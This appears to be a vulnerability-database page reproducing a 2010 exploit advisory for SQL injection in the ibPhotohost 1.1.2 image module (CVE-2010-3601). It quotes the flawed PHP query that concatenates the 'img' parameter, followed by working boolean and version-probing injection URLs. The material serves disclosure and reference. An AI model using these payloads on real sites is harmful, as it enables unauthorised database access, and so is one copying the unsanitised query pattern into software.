Lucene search
+L

ibPhotohost 1.1.2 - SQL Injection

🗓️ 21 Sep 2010 00:00:00Reported by fred777Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

ibPhotohost 1.1.2 is vulnerable to SQL Injection through the img parameter in the URL.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-3601
21 Sep 201000:00
circl
CVE
CVE-2010-3601
24 Sep 201019:44
cve
Cvelist
CVE-2010-3601
24 Sep 201019:44
cvelist
EUVD
EUVD-2010-3597
7 Oct 202500:30
euvd
NVD
CVE-2010-3601
24 Sep 201021:00
nvd
Prion
Sql injection
24 Sep 201021:00
prion
RedhatCVE
CVE-2010-3601
22 May 202505:38
redhatcve

#################################################
+
+  Title:       ibPhotohost 1.1.2 SQL Injection
+  Author:      fred777 - [fred777.5x.to]
+  Link:        http://mods.invisionize.com/index.php/f/7609
+  Vuln:        index.php?autocom=photohost&CODE=04&img=[SQL Injection]
+  Greetzz to:  back2hack,free-hack,hackbase,c-c
+  Contact:     [email protected]
+
#################################################

--[ Vuln Code ] --

$id = $this->ipsclass->input['img'];

	$this->ipsclass->DB->simple_construct(array(
	'select' => '*',
	'from' => 'imgupload',
	'where' => 'imgupload_id=' . $id,
	'order' => 'imgupload_date asc'
	));

################################################

--[ Exploitable ]--

http://site/index.php?autocom=photohost&CODE=04&img=[SQL Injection]

http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=1--+ => true
http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=0--+ => false

http://site/index.php?autocom=photohost&CODE=04&img=1+and+substring(version(),1,1)=5

################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.00973
33